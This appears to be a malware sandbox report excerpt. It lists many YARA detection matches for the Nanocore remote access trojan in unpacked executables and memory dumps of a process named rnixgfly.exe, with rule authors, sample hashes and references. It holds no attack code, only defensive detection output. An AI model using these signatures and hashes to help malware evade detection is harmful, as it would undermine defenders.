    Source: 2.2.rnixgfly.exe.35eb3f8.18.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.38b64be.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.38b64be.10.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.38b64be.10.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.3590fef.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.3590fef.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.3590fef.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.67c0000.27.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.67c0000.27.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.67c0000.27.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.370c32d.13.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.370c32d.13.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 2.2.rnixgfly.exe.67f0000.28.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.67f0000.28.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.67f0000.28.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.370c32d.13.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.2583a9c.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.2583a9c.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.2583a9c.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 2.2.rnixgfly.exe.2583a9c.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.25faee8.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.25faee8.6.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.25faee8.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.5d60000.25.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.5d60000.25.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.5d60000.25.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.5d60000.25.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.5d60000.25.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.5d60000.25.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.6870000.37.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.6870000.37.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.6870000.37.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 1.2.rnixgfly.exe.2210000.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 1.2.rnixgfly.exe.2210000.3.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 1.2.rnixgfly.exe.2210000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 1.2.rnixgfly.exe.2210000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 2.2.rnixgfly.exe.25f54b0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 2.2.rnixgfly.exe.25f54b0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects NanoCore Author: ditekSHen
    Source: 2.2.rnixgfly.exe.25f54b0.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 2.2.rnixgfly.exe.25f54b0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 00000002.00000002.508686978.00000000067C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000002.00000002.508686978.00000000067C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
    Source: 00000002.00000002.508686978.00000000067C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 00000002.00000002.509009346.0000000006860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000002.00000002.509009346.0000000006860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
    Source: 00000002.00000002.509009346.0000000006860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 00000002.00000002.508822078.0000000006800000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000002.00000002.508822078.0000000006800000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
    Source: 00000002.00000002.508822078.0000000006800000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 00000002.00000002.503941570.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 00000002.00000002.508900878.0000000006830000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000002.00000002.508900878.0000000006830000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
    Source: 00000002.00000002.508900878.0000000006830000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 00000002.00000002.506631236.0000000004F62000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000002.00000002.506631236.0000000004F62000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000002.00000002.506631236.0000000004F62000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 00000002.00000002.501682752.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000002.00000002.501682752.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000002.00000002.501682752.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 00000002.00000002.507046182.0000000005810000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000002.00000002.507046182.0000000005810000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
    Source: 00000002.00000002.507046182.0000000005810000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 00000002.00000002.508294915.0000000005D60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000002.00000002.508294915.0000000005D60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
    Source: 00000002.00000002.508294915.0000000005D60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 00000002.00000002.508782806.00000000067F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000002.00000002.508782806.00000000067F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
    Source: 00000002.00000002.508782806.00000000067F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 00000002.00000002.508849965.0000000006810000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000002.00000002.508849965.0000000006810000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
    Source: 00000002.00000002.508849965.0000000006810000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
    Source: 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000002.00000002.501206954.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 00000002.00000002.508596907.0000000006640000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000002.00000002.508596907.0000000006640000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
    Source: 00000002.00000002.508596907.0000000006640000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 00000002.00000002.509045139.0000000006870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000002.00000002.509045139.0000000006870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
    Source: 00000002.00000002.509045139.0000000006870000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 00000002.00000002.508870070.0000000006820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000002.00000002.508870070.0000000006820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
    Source: 00000002.00000002.508870070.0000000006820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 00000002.00000002.503941570.0000000003575000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 00000002.00000002.509221233.00000000068B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000002.00000002.509221233.00000000068B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
    Source: 00000002.00000002.509221233.00000000068B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 00000002.00000002.507263839.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000002.00000002.507263839.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
    Source: 00000002.00000002.507263839.00000000058C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 00000001.00000002.249320721.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000001.00000002.249320721.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
    Source: 00000001.00000002.249320721.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000001.00000002.249320721.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 00000002.00000002.508927189.0000000006840000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000002.00000002.508927189.0000000006840000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
    Source: 00000002.00000002.508927189.0000000006840000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 00000002.00000002.502515145.0000000002490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: 00000002.00000002.502515145.0000000002490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects NanoCore Author: ditekSHen
    Source: 00000002.00000002.502515145.0000000002490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000002.00000002.502515145.0000000002490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 00000002.00000002.503941570.0000000003851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000002.00000002.503941570.0000000003851000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 00000002.00000002.502791120.0000000002551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000002.00000002.502791120.0000000002551000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 00000002.00000002.503941570.000000000366D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000002.00000002.503941570.000000000366D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: 00000002.00000002.502791120.00000000025CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: 00000002.00000002.502791120.00000000025CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: Process Memory Space: rnixgfly.exe PID: 4904, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: Process Memory Space: rnixgfly.exe PID: 4904, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: Process Memory Space: rnixgfly.exe PID: 4904, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: Process Memory Space: rnixgfly.exe PID: 3192, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
    Source: Process Memory Space: rnixgfly.exe PID: 3192, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
    Source: Process Memory Space: rnixgfly.exe PID: 3192, type: MEMORYSTRMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
    Source: fyTwP4SHWF.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: 1.2.rnixgfly.exe.2223658.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 1.2.rnixgfly.exe.2223658.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 1.2.rnixgfly.exe.2223658.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 1.2.rnixgfly.exe.2223658.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 1.2.rnixgfly.exe.2223658.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.38c48ee.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.38c48ee.14.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.38c48ee.14.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.38c48ee.14.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.6810000.30.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.6810000.30.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.6810000.30.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.6810000.30.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.6830000.32.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.6830000.32.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.6830000.32.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.6830000.32.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.38b64be.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.38b64be.10.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.38b64be.10.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.38b64be.10.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.417058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.417058.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.417058.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
    Source: 2.2.rnixgfly.exe.417058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
    Source: 2.2.rnixgfly.exe.417058.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Nanocore_d8c4e3c5 reference_sample = b2262126a955e306dc68487333394dc08c4fbd708a19afeb531f58916ddb1cfd, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Nanocore, fingerprint = e5c284f14c1c650ef8ddd7caf314f5318e46a811addc2af5e70890390c7307d4, id = d8c4e3c5-8bcc-43d2-9104-fa3774282da5, last_modified = 2021-08-23
    Source: 2.2.rnixgfly.exe.38ad68f.19.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.38ad68f.19.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
    Source: 2.2.rnixgfly.exe.38ad68f.19.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NanoCore author = ditekSHen, description = Detects NanoCore
